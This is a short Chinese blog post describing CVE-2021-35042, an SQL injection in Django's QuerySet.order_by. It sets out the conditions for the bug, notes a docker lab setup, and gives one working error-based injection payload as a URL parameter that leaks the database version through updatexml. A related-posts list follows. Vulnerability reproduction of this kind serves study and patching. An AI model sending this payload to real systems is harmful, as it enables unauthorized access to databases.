漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
麦聪聊数据1 天前
MySQL并发与锁:从“防止超卖”到排查“死锁”黑白极客1 天前
怎么给字符串字段加索引?日志系统 一条更新语句是怎么执行的X***07881 天前
理解 MySQL 的索引设计逻辑:从数据结构到实际查询性能的系统分析爬山算法1 天前
Hibernate(31)Hibernate的原生SQL查询是什么?l1t1 天前
NineData第三届数据库编程大赛:用一条 SQL 解数独问题我的参赛程序施嘉伟1 天前
一次生产环境 SQL 不走索引的排查过程Web项目开发1 天前
Mysql创建索引的SQL脚本,复制粘贴即可使用Waloo1 天前
SQL Server 2017 EXISTS 关键字 完整用法详解(最全 + 最优写法 + 性能对比)周末吃鱼1 天前
mysql8.0支持CURRENT_DATE如何写尽兴-1 天前
SQL 执行失败如何回滚?事务已提交还能恢复吗?——MySQL 误操作数据恢复全指南